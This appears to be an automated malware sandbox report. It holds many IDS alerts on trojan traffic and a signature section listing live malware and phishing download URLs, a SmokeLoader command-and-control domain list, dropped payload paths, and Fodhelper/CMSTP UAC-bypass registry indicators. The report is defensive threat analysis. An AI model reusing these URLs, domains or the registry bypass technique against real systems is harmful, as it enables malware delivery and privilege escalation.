                  Timestamp:192.168.2.991.215.85.12049892802039103 02/08/24-19:10:12.871767
                  SID:2039103
                  Source Port:49892
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249788802049467 02/08/24-19:09:18.731907
                  SID:2049467
                  Source Port:49788
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249779802049467 02/08/24-19:09:14.298787
                  SID:2049467
                  Source Port:49779
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249877802049467 02/08/24-19:10:04.337440
                  SID:2049467
                  Source Port:49877
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2259303802049467 02/08/24-19:10:24.439859
                  SID:2049467
                  Source Port:59303
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049760802039103 02/08/24-19:08:54.565967
                  SID:2039103
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249825802049467 02/08/24-19:09:34.536841
                  SID:2049467
                  Source Port:49825
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9104.21.45.24249714802019714 02/08/24-19:08:00.773935
                  SID:2019714
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.9185.196.8.2249831802049467 02/08/24-19:09:37.886437
                  SID:2049467
                  Source Port:49831
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9172.67.213.168497184432050577 02/08/24-19:08:02.324088
                  SID:2050577
                  Source Port:49718
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249822802049467 02/08/24-19:09:33.352606
                  SID:2049467
                  Source Port:49822
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249905802049467 02/08/24-19:10:18.713028
                  SID:2049467
                  Source Port:49905
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249850802049467 02/08/24-19:09:49.583279
                  SID:2049467
                  Source Port:49850
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249849802049467 02/08/24-19:09:48.972985
                  SID:2049467
                  Source Port:49849
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249852802049467 02/08/24-19:09:50.191522
                  SID:2049467
                  Source Port:49852
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249855802049467 02/08/24-19:09:52.001596
                  SID:2049467
                  Source Port:49855
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049757802039103 02/08/24-19:08:47.625929
                  SID:2039103
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9104.21.83.220497234432050578 02/08/24-19:08:05.026835
                  SID:2050578
                  Source Port:49723
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249893802049467 02/08/24-19:10:12.860215
                  SID:2049467
                  Source Port:49893
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249896802049467 02/08/24-19:10:14.352917
                  SID:2049467
                  Source Port:49896
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2260102802049467 02/08/24-19:10:25.866317
                  SID:2049467
                  Source Port:60102
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249838802049467 02/08/24-19:09:42.801134
                  SID:2049467
                  Source Port:49838
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049752802039103 02/08/24-19:08:44.407767
                  SID:2039103
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249780802049467 02/08/24-19:09:14.867068
                  SID:2049467
                  Source Port:49780
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249844802049467 02/08/24-19:09:46.177648
                  SID:2049467
                  Source Port:49844
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.91.1.1.150164532050566 02/08/24-19:08:04.868954
                  SID:2050566
                  Source Port:50164
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249803802049467 02/08/24-19:09:26.537580
                  SID:2049467
                  Source Port:49803
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249885802049467 02/08/24-19:10:08.582993
                  SID:2049467
                  Source Port:49885
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249827802049467 02/08/24-19:09:36.103885
                  SID:2049467
                  Source Port:49827
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049765802039103 02/08/24-19:09:01.499637
                  SID:2039103
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249796802049467 02/08/24-19:09:22.520653
                  SID:2049467
                  Source Port:49796
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249879802049467 02/08/24-19:10:04.969999
                  SID:2049467
                  Source Port:49879
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249868802049467 02/08/24-19:10:00.038920
                  SID:2049467
                  Source Port:49868
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249880802049467 02/08/24-19:10:05.565778
                  SID:2049467
                  Source Port:49880
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249874802049467 02/08/24-19:10:02.523065
                  SID:2049467
                  Source Port:49874
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249791802049467 02/08/24-19:09:20.503427
                  SID:2049467
                  Source Port:49791
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249833802049467 02/08/24-19:09:39.117166
                  SID:2049467
                  Source Port:49833
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.9049731802856233 02/08/24-19:08:16.811090
                  SID:2856233
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249845802049467 02/08/24-19:09:47.131082
                  SID:2049467
                  Source Port:49845
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2257197802049467 02/08/24-19:10:22.440269
                  SID:2049467
                  Source Port:57197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249854802049467 02/08/24-19:09:51.382768
                  SID:2049467
                  Source Port:49854
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249793802049467 02/08/24-19:09:21.677978
                  SID:2049467
                  Source Port:49793
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249863802049467 02/08/24-19:09:56.434089
                  SID:2049467
                  Source Port:49863
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049808802039103 02/08/24-19:09:27.936988
                  SID:2039103
                  Source Port:49808
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249891802049467 02/08/24-19:10:12.266147
                  SID:2049467
                  Source Port:49891
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249774802049467 02/08/24-19:09:10.756652
                  SID:2049467
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049820802039103 02/08/24-19:09:32.222013
                  SID:2039103
                  Source Port:49820
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249900802049467 02/08/24-19:10:16.161208
                  SID:2049467
                  Source Port:49900
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249869802049467 02/08/24-19:10:00.654537
                  SID:2049467
                  Source Port:49869
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249784802049467 02/08/24-19:09:17.200830
                  SID:2049467
                  Source Port:49784
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249882802049467 02/08/24-19:10:06.739733
                  SID:2049467
                  Source Port:49882
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.7949735802044243 02/08/24-19:08:19.831146
                  SID:2044243
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.7949735802044244 02/08/24-19:08:20.328929
                  SID:2044244
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049878802039103 02/08/24-19:10:04.633582
                  SID:2039103
                  Source Port:49878
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.7949735802044246 02/08/24-19:08:20.673065
                  SID:2044246
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249789802049467 02/08/24-19:09:19.301426
                  SID:2049467
                  Source Port:49789
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2250341802049467 02/08/24-19:10:19.803464
                  SID:2049467
                  Source Port:50341
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249811802049467 02/08/24-19:09:28.910879
                  SID:2049467
                  Source Port:49811
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249887802049467 02/08/24-19:10:09.768217
                  SID:2049467
                  Source Port:49887
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049802802039103 02/08/24-19:09:26.170204
                  SID:2039103
                  Source Port:49802
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249798802049467 02/08/24-19:09:24.129980
                  SID:2049467
                  Source Port:49798
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.91.1.1.163216532050567 02/08/24-19:08:00.727246
                  SID:2050567
                  Source Port:63216
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249775802049467 02/08/24-19:09:11.429424
                  SID:2049467
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249864802049467 02/08/24-19:09:57.442700
                  SID:2049467
                  Source Port:49864
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249890802049467 02/08/24-19:10:11.594519
                  SID:2049467
                  Source Port:49890
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249783802049467 02/08/24-19:09:16.613403
                  SID:2049467
                  Source Port:49783
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249812802049467 02/08/24-19:09:29.503204
                  SID:2049467
                  Source Port:49812
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249872802049467 02/08/24-19:10:01.878786
                  SID:2049467
                  Source Port:49872
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249901802049467 02/08/24-19:10:16.810636
                  SID:2049467
                  Source Port:49901
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249835802049467 02/08/24-19:09:41.024212
                  SID:2049467
                  Source Port:49835
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249853802049467 02/08/24-19:09:50.795211
                  SID:2049467
                  Source Port:49853
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249859802049467 02/08/24-19:09:54.548248
                  SID:2049467
                  Source Port:49859
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249888802049467 02/08/24-19:10:10.379849
                  SID:2049467
                  Source Port:49888
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049810802039103 02/08/24-19:09:28.879023
                  SID:2039103
                  Source Port:49810
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049756802039103 02/08/24-19:08:46.478100
                  SID:2039103
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249836802049467 02/08/24-19:09:41.610105
                  SID:2049467
                  Source Port:49836
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249801802049467 02/08/24-19:09:25.940566
                  SID:2049467
                  Source Port:49801
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249830802049467 02/08/24-19:09:37.277094
                  SID:2049467
                  Source Port:49830
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249799802049467 02/08/24-19:09:24.710478
                  SID:2049467
                  Source Port:49799
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249883802049467 02/08/24-19:10:07.365354
                  SID:2049467
                  Source Port:49883
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9172.67.152.52497164432050574 02/08/24-19:08:00.888334
                  SID:2050574
                  Source Port:49716
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249813802049467 02/08/24-19:09:30.257909
                  SID:2049467
                  Source Port:49813
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249773802049467 02/08/24-19:09:10.181251
                  SID:2049467
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249797802049467 02/08/24-19:09:23.517259
                  SID:2049467
                  Source Port:49797
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249886802049467 02/08/24-19:10:09.163427
                  SID:2049467
                  Source Port:49886
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249889802049467 02/08/24-19:10:10.981470
                  SID:2049467
                  Source Port:49889
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249807802049467 02/08/24-19:09:27.711722
                  SID:2049467
                  Source Port:49807
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249840802049467 02/08/24-19:09:44.369293
                  SID:2049467
                  Source Port:49840
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249843802049467 02/08/24-19:09:45.594918
                  SID:2049467
                  Source Port:49843
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249834802049467 02/08/24-19:09:40.099257
                  SID:2049467
                  Source Port:49834
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049766802039103 02/08/24-19:09:04.504992
                  SID:2039103
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249828802049467 02/08/24-19:09:36.679870
                  SID:2049467
                  Source Port:49828
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249837802049467 02/08/24-19:09:42.191478
                  SID:2049467
                  Source Port:49837
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049841802039103 02/08/24-19:09:44.057462
                  SID:2039103
                  Source Port:49841
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049764802039103 02/08/24-19:09:00.583538
                  SID:2039103
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249792802049467 02/08/24-19:09:21.068319
                  SID:2049467
                  Source Port:49792
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249832802049467 02/08/24-19:09:38.515899
                  SID:2049467
                  Source Port:49832
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049758802039103 02/08/24-19:08:49.494936
                  SID:2039103
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249904802049467 02/08/24-19:10:18.106358
                  SID:2049467
                  Source Port:49904
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249881802049467 02/08/24-19:10:06.151154
                  SID:2049467
                  Source Port:49881
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249826802049467 02/08/24-19:09:35.488215
                  SID:2049467
                  Source Port:49826
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249867802049467 02/08/24-19:09:59.395371
                  SID:2049467
                  Source Port:49867
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249778802049467 02/08/24-19:09:13.646694
                  SID:2049467
                  Source Port:49778
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249821802049467 02/08/24-19:09:32.725299
                  SID:2049467
                  Source Port:49821
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249856802049467 02/08/24-19:09:52.646331
                  SID:2049467
                  Source Port:49856
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049829802039103 02/08/24-19:09:36.963530
                  SID:2039103
                  Source Port:49829
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249862802049467 02/08/24-19:09:55.804272
                  SID:2049467
                  Source Port:49862
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049747802039103 02/08/24-19:08:43.263813
                  SID:2039103
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249897802049467 02/08/24-19:10:14.987166
                  SID:2049467
                  Source Port:49897
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249809802049467 02/08/24-19:09:28.304880
                  SID:2049467
                  Source Port:49809
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049753802039103 02/08/24-19:08:45.348799
                  SID:2039103
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249767802049467 02/08/24-19:09:04.935514
                  SID:2049467
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://185.172.128.19/288c47bbc1871b439df19ff4df68f0776.exeAvira URL Cloud: Label: malware
                  Source: http://185.172.128.127/syncUpd.exeAvira URL Cloud: Label: malware
                  Source: http://sjyey.com/tmp/index.phpAvira URL Cloud: Label: malware
                  Source: http://5.42.64.33/ping.php?substr=fourAvira URL Cloud: Label: malware
                  Source: https://claimconcessionrebe.shop/apiAvira URL Cloud: Label: phishing
                  Source: http://emgvod.com/emd/1.jpgAvira URL Cloud: Label: malware
                  Source: https://secretionsuitcasenioise.shop/apiAvira URL Cloud: Label: malware
                  Source: http://asx.sunaviat.com/data/pdf/may.exeAvira URL Cloud: Label: malware
                  Source: http://emgvod.com/uploads/logo3.jpgAvira URL Cloud: Label: phishing
                  Source: http://185.172.128.90/cpa/ping.php?substr=four&s=abAvira URL Cloud: Label: malware
                  Source: https://liabilityarrangemenyit.shop/apiAvira URL Cloud: Label: malware
                  Source: https://gemcreedarticulateod.shop/apiAvira URL Cloud: Label: phishing
                  Source: http://trmpc.com/check/index.phpAvira URL Cloud: Label: malware
                  Source: http://selebration17io.io/index.phpAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
                  Multi AV Scanner detection for dropped file
                  Source: C:\ProgramData\Drivers\csrss.exeReversingLabs: Detection: 87%
                  Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeReversingLabs: Detection: 79%
                  Source: C:\Users\user\AppData\Local\Temp\671C.exeReversingLabs: Detection: 100%
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeReversingLabs: Detection: 87%
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeReversingLabs: Detection: 54%
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\97EA.dllReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 21%
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\AppData\Roaming\afratejReversingLabs: Detection: 81%
                  Multi AV Scanner detection for submitted file
                  Source: ccQGH1mKws.exeReversingLabs: Detection: 81%
                  Yara detected Glupteba
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Machine Learning detection for dropped file
                  Source: C:\ProgramData\Drivers\csrss.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeJoe Sandbox ML: detected
                  Source: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: ccQGH1mKws.exeJoe Sandbox ML: detected
                  Source: 8837.exe, 00000008.00000003.2745920242.00000000038F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_a5a53b56-6

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 10.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1813537584.0000000000413000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1863394121.0000000000413000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY

                  Privilege Escalation

                  barindex
                  UAC bypass detected (Fodhelper)
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeRegistry value created: DelegateExecute
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeRegistry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

                  Bitcoin Miner

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 27.2.anyburnfree.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
                  Source: ccQGH1mKws.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.9:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.152.52:443 -> 192.168.2.9:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.213.233.138:443 -> 192.168.2.9:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.168:443 -> 192.168.2.9:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.199.120:443 -> 192.168.2.9:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.9:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.9:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 103.20.213.70:443 -> 192.168.2.9:49759 version: TLS 1.2
